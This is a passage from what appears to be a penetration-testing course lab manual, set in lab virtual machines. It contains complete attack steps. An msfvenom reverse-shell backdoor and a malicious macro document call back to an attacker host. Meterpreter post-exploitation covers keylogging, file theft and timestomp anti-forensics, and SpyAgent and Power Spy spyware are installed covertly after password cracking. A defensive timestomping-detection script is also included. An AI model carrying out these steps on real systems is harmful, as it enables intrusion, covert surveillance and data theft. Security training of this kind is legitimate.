30. Navigate to Home/TheFatRat/output to find the generated Word file as shown in the screenshot.
31. Open another terminal window and launch Metasploit by typing msfconsole and hit Enter.
33. Type set payload windows/meterpreter/reverse_tcp and hit Enter as shown in the screenshot.
34. Type set LHOST 10.10.10.11 and hit Enter, type set LPORT 4444 and hit Enter, and finally type show options and hit Enter.
35. Now type run and hit Enter to start the listener.
36. Now open another terminal window and type cp /root/TheFatRat/output/BadDoc.docm /var/www/html/share/ and hit Enter.
37. Then type service apache2 start and hit Enter.
38. Now switch to the Windows Server 2012 system and open a browser (here, Internet Explorer).
39. In the address bar, type http://10.10.10.11/share/ as the URL and hit Enter.
40. The Index of /share page appears; click BadDoc.docm to download it.
41. Click Save in the download prompt as shown in the screenshot.
42. Open your Downloads folder and double-click the Word file downloaded in the previous step.
43. MS Word opens the file in Protected View. Click Enable Editing as shown in the screenshot.
44. A Security Warning appears; click Enable Content as shown in the screenshot.
45. Now if you switch back to the Kali Linux system, you will find that a Meterpreter session has been opened in the Metasploit terminal.
46. Type sessions -l and hit Enter to see all the active sessions as shown in the screenshot.
47. Type sessions -i 1 and hit Enter to get the Meterpreter command line as shown in the screenshot.
48. Type sysinfo and hit Enter to view the system details of the exploited computer as shown in the screenshot.

Lab Analysis
Analyze and document the results related to the lab exercise.

Hacking Windows 10 using Metasploit and Post-Exploitation using Meterpreter
Metasploit Framework is a tool for developing and executing exploit code against a remote target machine.

Lab Scenario
Backdoors are malicious files that contain Trojans or other infectious applications that can either halt the current working state of a target machine or even gain partial/complete control over it. Attackers build such backdoors in an attempt to gain remote access to the victim machines. They send these backdoors through email, file-sharing web applications, shared network drives, among others, and entice the users to execute them. Once a user executes such an application, an attacker can gain access to his/her affected machine and perform activities such as keylogging, sensitive data extraction, and so on, which can incur severe damage to the affected user.

Lab Objectives
The objective of this lab is to help students learn to detect Trojan and backdoor attacks. The objectives of this lab include:
• Creating a server and testing the network for attack
• Attacking the network using a sample backdoor and monitoring system activity

Lab Environment
To carry this out, you need:
• Kali Linux running in a virtual machine
• Windows 10 running in a virtual machine (victim machine)
• A web browser with Internet access
• Administrative privileges to run tools

Lab Duration

Overview of the Lab
A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.

Lab Tasks
Note: Make sure to disable Windows SmartScreen and Windows Defender in Windows 10.
1. Before beginning this lab, create a text file named secret.txt on the Windows 10 virtual machine; write something in it and save it in the location C:\Users\Admin\Downloads.
2. In this lab, the secret file contains the text "My credit card account number is 123456789."
3. Log in to the Kali Linux virtual machine.
4. Launch a command line terminal.
5. Type the command msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -e x86/shikata_ga_nai -b "\x00" LHOST=10.10.10.11 -f exe > Desktop/Backdoor.exe and press Enter.
6. This creates a backdoor on the Desktop.
7. Now you need to share Backdoor.exe with the victim machine (in this lab, Windows 10 is the victim machine).
8. To share the file, you need to start the Apache server. Type the command service apache2 start in the terminal, and press Enter.
9. Now that the Apache web server is running, copy Backdoor.exe into the share folder.
10. Type cp /root/Desktop/Backdoor.exe /var/www/html/share/ and press Enter.
11. Now, type the command msfconsole and press Enter to launch msfconsole.
12. Type use exploit/multi/handler and press Enter, to handle exploits launched outside the framework.
13. Now, issue the following commands in msfconsole:
a) Type set payload windows/meterpreter/reverse_tcp and press Enter.
b) Type set LHOST 10.10.10.11 and press Enter.
c) Type show options and press Enter. This lets you know the listening port.
15. Log on to the Windows 10 victim machine.
16. Launch Firefox or any web browser, type http://10.10.10.11/share/ in the URL field and press Enter.
Note: 10.10.10.11 is the IP address of Kali Linux, which may vary in your lab environment.
17. Click the Backdoor.exe link to download the backdoor file.
Note: Make sure both the Backdoor.exe and secret.txt files are in the same directory.
18. The Opening Backdoor.exe pop-up appears; click Save File.
Note: If you don't have apache2 installed, run apt-get install apache2.
19. By default, this file is stored in C:\Users\Admin\Downloads.
20. On completion of the download, a download notification appears in the browser. Click Open Containing Folder.
21. Double-click Backdoor.exe. If an Open File - Security Warning appears, click Run.
22. Switch back to the Kali Linux machine. A Meterpreter session has been successfully opened as shown in the following screenshot.
23. Type sessions and press Enter to view the active sessions.
24. Type sessions -i 1 and press Enter (1 in the sessions -i 1 command is the id number of the session).
The Meterpreter shell is launched as shown in the following screenshot.
25. Type sysinfo and press Enter. Issuing this command displays target machine information such as computer name, operating system, and so on.
26. Type ipconfig and press Enter. This displays the victim machine's IP address, MAC address, and so on.
27. Type getuid and press Enter.
28. Running getuid shows the attacker that the Meterpreter server is running as administrator on the host.
29. Type pwd and press Enter to view the current working directory on the remote (target) machine.
Note: The current working directory will differ according to where you have saved the Backdoor.exe file; therefore the screenshots might differ in your lab environment.
30. Type ls and press Enter to list the files in the current working directory.
Note: The screenshots might differ in your lab environment.
31. To read the contents of a text file, type cat filename.txt (here, secret.txt) and press Enter.
32. Change the MACE attributes of secret.txt.
33. While performing post-exploitation activities, a hacker tries to access files to read their contents. Upon doing so, the MACE attributes change immediately, which gives an indication to the file user/owner that someone has read or modified the information.
34. To leave no hint of these MACE attributes, use the timestomp command to change the attributes as you wish after accessing the file.
35. To view the MACE attributes of secret.txt, type timestomp secret.txt -v and press Enter. This displays the created time, accessed time, modified time, and entry modified time, as shown in the screenshot.
36. The cd command changes the present working directory. As you know, the current working directory is C:\Users\Student\Downloads.
37. Type cd / to change the current remote directory to C:\.
38. Now type pwd and press Enter.
39. Observe that the current remote directory has changed.
40. Type ls and press Enter to list the files in the current working directory.
41. The download command downloads a file from the remote machine.
42. Type download filename.extension (in this lab, dotnetfx.exe) and press Enter.
43. The downloaded file is stored in the Home folder by default. Click Places, and click Home.
44. The downloaded file is available in the home folder as shown in the following screenshot.
45. The search command helps you locate files on the victim machine. The command is capable of searching through the whole system or specific folders.
46. Type search -f filename.ext (here, pagefile.sys) and press Enter.
47. Type keyscan_start and press Enter. This starts capturing all keyboard input from the victim system.
48. Switch back to the Windows 10 machine, create a text file and start typing something.
49. Switch to the Kali Linux machine. Type keyscan_dump and press Enter. This dumps all the keystrokes.
50. Type idletime and press Enter.
51. Issuing this command displays the number of seconds for which the user has been idle on the remote system.
52. You may shut down the victim machine after performing post-exploitation.
53. Type shutdown and press Enter. This shuts down the victim machine.

Lab Analysis
Analyze and document the results related to this lab exercise. Provide your opinion of your target's security posture and exposure through public and free information.
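The timestomp steps of this lab (steps 32 to 35) show the attacker's side of MACE manipulation. As an added example that is not part of the lab manual or of Metasploit, the Python check below is what a responder can run over a directory to flag the artefacts such tools leave behind; the sample timestamps, the floor date and the temporary file are constructed here.

```python
"""Heuristic detection of timestamp tampering (timestomping) on files.

Added example for the MACE/timestomp steps of this lab; it is not part of the
lab or of Metasploit. It flags artefacts that timestamp-rewriting tools leave:
whole-second values, dates in the future, and dates older than the filesystem.
"""
import os
import tempfile
import time
from typing import Dict, List, Tuple

NS_PER_SECOND = 1_000_000_000


def stat_times(path: str) -> Dict[str, int]:
    """Collect modified/accessed/created times in nanoseconds since the epoch.

    os.stat does not expose the NTFS entry-modified time, so only three of the
    four MACE values are checked; 'created' falls back to st_ctime on platforms
    without a birth time (e.g. Linux), where it reflects the last metadata change.
    """
    st = os.stat(path)
    created = getattr(st, "st_birthtime_ns", None)
    if created is None:
        created = st.st_ctime_ns
    return {"modified": st.st_mtime_ns, "accessed": st.st_atime_ns, "created": created}


def check_timestamps(times: Dict[str, int], now_ns: int, floor_ns: int) -> List[str]:
    """Return human-readable tampering indicators, or [] when nothing is odd.

    Indicators:
      * whole-second values: NTFS keeps 100 ns resolution, while timestomp-style
        tools write values parsed from a "MM/DD/YYYY HH24:MI:SS" string, so the
        fractional part comes out as exactly zero;
      * a timestamp later than "now" (the operator may pick any date);
      * a timestamp earlier than floor_ns, e.g. the volume's creation date
        (a file cannot legitimately predate the filesystem it lives on).
    A modified time earlier than the created time is deliberately NOT used:
    copying a file legitimately produces that ordering.
    """
    findings: List[str] = []
    whole_second: List[str] = []
    for name, value in times.items():
        if value % NS_PER_SECOND == 0:
            whole_second.append(name)
        if value > now_ns:
            findings.append(f"{name}: timestamp is in the future")
        if value < floor_ns:
            findings.append(f"{name}: timestamp predates the volume/OS floor")
    if times and len(whole_second) == len(times):
        findings.append("all timestamps fall on a whole second")
    elif whole_second:
        findings.append("whole-second timestamps: " + ", ".join(whole_second))
    return findings


def scan_directory(root: str, now_ns: int, floor_ns: int) -> List[Tuple[str, List[str]]]:
    """Walk a directory tree and return (path, findings) for every flagged file."""
    flagged: List[Tuple[str, List[str]]] = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            findings = check_timestamps(stat_times(path), now_ns, floor_ns)
            if findings:
                flagged.append((path, findings))
    return flagged


# Constructed sample values (nanoseconds since the epoch) for a stand-alone run.
NOW_NS = 1_700_000_000 * NS_PER_SECOND        # 2023-11-14 22:13:20 UTC
FLOOR_NS = 1_420_070_400 * NS_PER_SECOND      # 2015-01-01 00:00:00 UTC, assumed volume creation
GENUINE = {                                   # ordinary sub-second timestamps
    "modified": NOW_NS - 86_400 * NS_PER_SECOND + 123_456_700,
    "accessed": NOW_NS - 3_600 * NS_PER_SECOND + 987_654_300,
    "created": NOW_NS - 2 * 86_400 * NS_PER_SECOND + 55_555_500,
}
STOMPED = {k: 1_325_376_000 * NS_PER_SECOND   # 2012-01-01 00:00:00 exactly, as a tool would set
           for k in ("modified", "accessed", "created")}


def demo_on_temp_file() -> List[str]:
    """Create a real file, rewrite its M and A times to a whole second the way
    a timestomping tool would, and return what the checker reports."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "secret.txt")
        with open(path, "w") as fh:
            fh.write("constructed sample content\n")
        stomped_ns = 1_325_376_000 * NS_PER_SECOND
        os.utime(path, ns=(stomped_ns, stomped_ns))   # (atime_ns, mtime_ns)
        return check_timestamps(stat_times(path), time.time_ns(), 0)


if __name__ == "__main__":
    print("genuine :", check_timestamps(GENUINE, NOW_NS, FLOOR_NS))
    print("stomped :", check_timestamps(STOMPED, NOW_NS, FLOOR_NS))
    print("tempfile:", demo_on_temp_file())
```

Run it against a directory with scan_directory(root, time.time_ns(), volume_creation_ns); on NTFS, compare the flagged files' $STANDARD_INFORMATION times with $FILE_NAME times from a forensic image for confirmation, since user-mode tools rewrite only the former.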
Internet Connection Required: No
Platform Supported: iLabs

User System Monitoring and Surveillance using Spytech SpyAgent
Spytech SpyAgent is a powerful computer spy software that allows you to monitor everything users do on a computer, in total stealth. SpyAgent provides a large array of essential computer monitoring features, as well as website, application, and chat-client blocking, lockdown scheduling, and remote delivery of logs via email or FTP.

Lab Scenario
Today, employees are given access to a wide array of electronic communication equipment. Email, instant messaging, global positioning systems, telephone systems, and video cameras have given employers new ways to monitor the conduct and performance of their employees. Many employees are provided with a laptop computer and mobile phone they can take home and use for business outside the workplace. Whether an employee can reasonably expect privacy when using such company-supplied equipment depends, in large part, on the security policy the employer has put in place and made known to employees. In this lab, we explain the process of monitoring employee activities using Spytech SpyAgent.

Lab Objectives
The objective of this lab is to help students use Spytech SpyAgent. After completing this lab, students will be able to:
• Install and configure Spytech SpyAgent in the victim machine
• Monitor keystrokes typed, websites visited, and Internet traffic data

Lab Environment
To perform this lab, you need:
• A computer running Windows Server 2016
• Run this tool on Windows Server 2012 (victim machine)
• Or, download Spytech SpyAgent at http://www.spytech-web.com/spyagent.shtml
• If you wish to download the latest version, screenshots may differ
• Administrative privileges to install and run tools

Lab Duration

Overview of the Lab
This lab demonstrates to students how to establish a remote desktop connection with a victim machine and install and operate Spytech SpyAgent to track user activities.
1. This lab works only if the target machine is turned on.
2. Since you have seen how to escalate privileges in the earlier lab (Escalating Privileges by Exploiting Client Side Vulnerabilities), you will use the same technique to escalate privileges and then dump the password hashes.
3. On obtaining the hashes, you will use a password cracking application such as RainbowCrack to obtain plain text passwords.
4. Once you have the passwords handy, you will establish a Remote Desktop Connection as an attacker, install Spytech SpyAgent and leave it in stealth mode.
Note: In this lab, you are connecting remotely to the Windows Server 2012 virtual machine. You can establish a remote connection only for a user account that has administrative privileges (here, the Jason user account has administrative privileges, so we shall be logging in to it).
5. The next task would be to log on to the virtual machine as a legitimate user (here, you) and perform user activities without being aware of the application tracking your activities in the background.
6. Once done, you will again establish a Remote Desktop Connection as an attacker, bring the application out of stealth mode, and monitor the activities performed on the virtual machine by the victim (you).

Lab Tasks
1. Log in to the Windows Server 2016 machine and click the Search icon on the taskbar.
2. In the Search field, search for Remote Desktop Connection.
3. Click Remote Desktop Connection in the Search results.
4. The Remote Desktop Connection window opens. Enter the IP address of Windows Server 2012 (in this lab, 10.10.10.12, which might differ in your lab environment) in the Computer field, and click Show Options.
5. Enter a username that has administrative privileges (here, Jason) and click Connect.
6. The host machine tries to establish a remote connection with the target machine.
7. A Windows Security pop-up appears; enter the password (qwerty) and click OK.
8. A Remote Desktop Connection window appears; click Yes.
Note: You cannot access a Remote Desktop Connection if the target machine is shut down. Remote Desktop Connection is possible only if the machine is turned on.
9. A Remote Desktop connection is successfully established, as shown in the screenshot.
12. If the Cannot access network resource dialog box appears, enter the credentials.
13. The Spytech SpyAgent Setup window appears; click Next.
14. The welcome wizard of the Spytech SpyAgent Setup program window appears; read the instructions and click Next.
15. The Important Notes wizard appears; read the notes and click Next.
16. The Software License Agreement window appears; you need to accept the agreement to install Spytech SpyAgent.
17. So, click Yes to continue.
18. The Choose Destination Location window appears; edit the destination folder if you wish to install Spytech SpyAgent elsewhere.
19. Click Next to continue the installation.
20. The Select SpyAgent Installation Type window appears; select the Administrator/Tester setup type.
21. Click Next.
22. The Ready to Install window appears; click Next to start installing Spytech SpyAgent.
23. The Spytech SpyAgent Setup dialog box prompts you to include an uninstaller; click Yes.
24. A Spytech SpyAgent window appears; close the window.
25. The A NOTICE FOR ANTIVIRUS USERS window appears; read the notice, and click Next.
26. The Finished window appears; uncheck View Help Documentation, and click Close to end the setup.
27. The Spytech SpyAgent dialog box appears; click Continue...
28. Step 1 of the setup wizard appears; click Click to continue.
29. Enter a password in the New Password field, and retype the same password in the Confirm field.
Note: Here, the password entered is qwerty@123.
30. Click OK.
31. The password changed pop-up appears; click OK.
32. Step 2 of the Welcome wizard appears; click Click to continue.
33. The Configuration section of the setup wizard appears; click the Complete + Stealth Configuration radio button, and click Next.
34. The Extras section of the setup wizard appears; check Load on Windows Startup.
35. The Confirm Settings section of the setup wizard appears; click Next.
36. The Apply section of the setup wizard appears; click Next.
37. The Finished window appears; click Finish to successfully set up SpyAgent.
38. The main window of SpyAgent appears along with Step 3 of the setup wizard.
39. Click Click to continue.
40. If a Getting Started dialog box appears, click No.
41. To track the general user activities, click Start Monitoring.
42. The Enter Access Password window appears; enter the password you specified earlier in this lab (qwerty@123) and click OK.
43. The Stealth Notice window appears; read the instructions and click OK.
Note: To bring SpyAgent out of stealth mode, press Ctrl+Shift+Alt+M.
44. A SpyAgent pop-up appears. Check Do not show this Help Tip again and Do not show Related Help Tips like this again; click Click to continue.
45. Close the Remote Desktop Connection.
46. Now log on to the Windows Server 2012 virtual machine's Jason account as a legitimate user (assume you are acting as the victim).
47. Browse the Internet (anything) or perform any user activity.
48. Now, switch back to the host machine, and perform steps 4-8 to launch Remote Desktop Connection (you are logging into the machine as an attacker).
49. To bring SpyAgent out of stealth mode, press Ctrl+Shift+Alt+M.
50. SpyAgent asks for an Access Password (qwerty@123); enter it and click OK.
51. To check user keystrokes from the keyboard, click Keyboard & Mouse on the SpyAgent GUI.
52. Select View Keystrokes Log.
53. A list of keystroke log entries is displayed. Select an application whose log entries you want to view. Here, bank account details have been viewed.
Note: If a User Account Control pop-up appears asking you to disable the UAC, click Yes.
54. SpyAgent displays all the resultant keystrokes for the selected application, as shown in the screenshot.
55. To check the websites visited by the user, click Website Usage.
56. Select View Websites Logged.
58. In the same way, you can select each tile to view all the activities.
59. Once you are finished, close the remote desktop connection.
60. This way, even an attacker can hack into a machine and install SpyAgent to spy on all activities performed by a user on his/her system.

Lab Analysis
Analyze and document the results related to this lab exercise. Provide your opinion regarding your target's security posture and exposure.
PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS

Web Activity Monitoring and Recording using Power Spy
Power Spy software lets you secretly monitor and record all activities on your computer, which is completely legal.

Lab Scenario
New technologies allow employers to check whether employees are wasting time at recreational Web sites or sending unprofessional emails. At the same time, organizations should be careful so that legitimate business interests do not become an unacceptable invasion of worker privacy. Before deploying an employee monitoring program, you should clarify the terms of acceptable and unacceptable use of corporate resources during working hours, and develop a comprehensive acceptable use policy (AUP) that staff must agree to. In this lab, we explain the process of monitoring employee activities using Power Spy.

Lab Objectives
The objective of this lab is to help students use the activity monitoring tool. After completing this lab, students will be able to:
• Install and configure Power Spy
• Monitor keystrokes typed, websites visited, and Internet traffic data

Lab Environment
To perform this lab, you need:
• A computer running Windows Server 2016
• A computer running Windows Server 2012 as a virtual machine (victim machine)
• You can download the Power Spy tool from http://ematrixsoft.com/download.php?c=powerspy-software
• If you wish to download the latest version, screenshots may differ
• Administrative privileges to install and run tools

Lab Duration
Time: 15 Minutes

Overview of the Lab
This lab demonstrates to students how to establish a remote desktop connection with a victim machine and install and operate Power Spy to monitor user activities.
1. This works only if the target machine is turned on.
2. As you have seen how to escalate privileges in the earlier lab (Escalating Privileges by Exploiting Client Side Vulnerabilities), you will use the same technique to escalate privileges and then dump the password hashes.
3. On obtaining the hashes, you will use a password cracking application such as RainbowCrack to obtain plain text passwords.
4. Once you have the passwords handy, you will establish a Remote Desktop Connection as an attacker, install Power Spy and leave it in stealth mode.
Note: In this lab, you are connecting remotely to the Windows Server 2012 virtual machine. You can establish a remote connection only for a user account that has administrative privileges (here, Jason has administrative privileges).
5. The next task will be to log on to the virtual machine as a legitimate user (here, you) and perform user activities without being aware of the application tracking your activities.
6. Having done so, you will again establish a Remote Desktop Connection as an attacker, bring the application out of stealth mode, and monitor the activities performed on the virtual machine by the victim (you).

Lab Tasks
1. In the Windows Server 2016 machine, click the Search icon in the taskbar to open the search menu.
2. Here, search for Remote Desktop Connection.
3. Click Remote Desktop Connection in the Search results.
4. The Remote Desktop Connection window appears; enter the IP address of Windows Server 2012 (in this lab, 10.10.10.12, which might differ in your lab environment) in the Computer field, and click Show Options.
5. Enter the username whose account has administrative privileges (here, Jason).
6. The host machine tries to establish a remote connection with the target machine.
7. A Windows Security pop-up appears; enter the password (qwerty) and click OK.
8. A Remote Desktop Connection window appears; click Yes.
Note: You cannot access a Remote Desktop Connection if the target machine is shut down. It is possible only if the machine is turned on.
9. A Remote Desktop connection is successfully established, as shown in the screenshot.
10. Close the Server Manager window.
11. Navigate to Z:\CEH-Tools\CEHv10 Module 06 System Hacking\Spyware\General Spyware\Power Spy.
12. Double-click setup.exe.
13. If the Open File - Security Warning pop-up appears, click Run.
14. Follow the installation steps to install Power Spy.
15. On completing the installation, the Run as Administrator window appears; click Run.
16. The Setup Login Password window appears; enter the password (qwerty@123) in the New password and Confirm password fields.
17. Click Submit.
18. The Welcome To Power Spy Control Panel! webpage appears in the default browser. Close the browser.
19. If the Microsoft Phishing Filter pop-up appears, select Ask me later and click OK.
20. The Information dialog box appears on the Setup login password window.
21. The Enter login password window appears; enter the password (which you set earlier).
22. Click Submit.
23. The Register product window appears; click Later to continue.
24. The main window of Power Spy opens as shown below.
25. Click Start Monitoring.
26. If the System Reboot Recommended window appears, click OK.
27. Click Stealth Mode (stealth mode runs Power Spy completely invisibly on the computer).
28. The Hotkey reminder dialog box appears; click OK (to unhide Power Spy, use the Ctrl+Alt+X keys together on your PC keyboard).
29. The Confirm dialog box appears; click Yes.
30. Close the Remote Desktop Connection.
31. Log on to the Windows Server 2012 virtual machine's Jason account as a legitimate user (here, assume you are acting as the victim).
32. Browse the Internet (anything) or perform any user activity. In this lab, the Facebook and LinkedIn websites have been browsed.
33. Once you have performed some user activities, follow steps 1-8 to launch Remote Desktop Connection (you are logging in as an attacker).
34. To bring Power Spy out of stealth mode, press Ctrl+Alt+X.
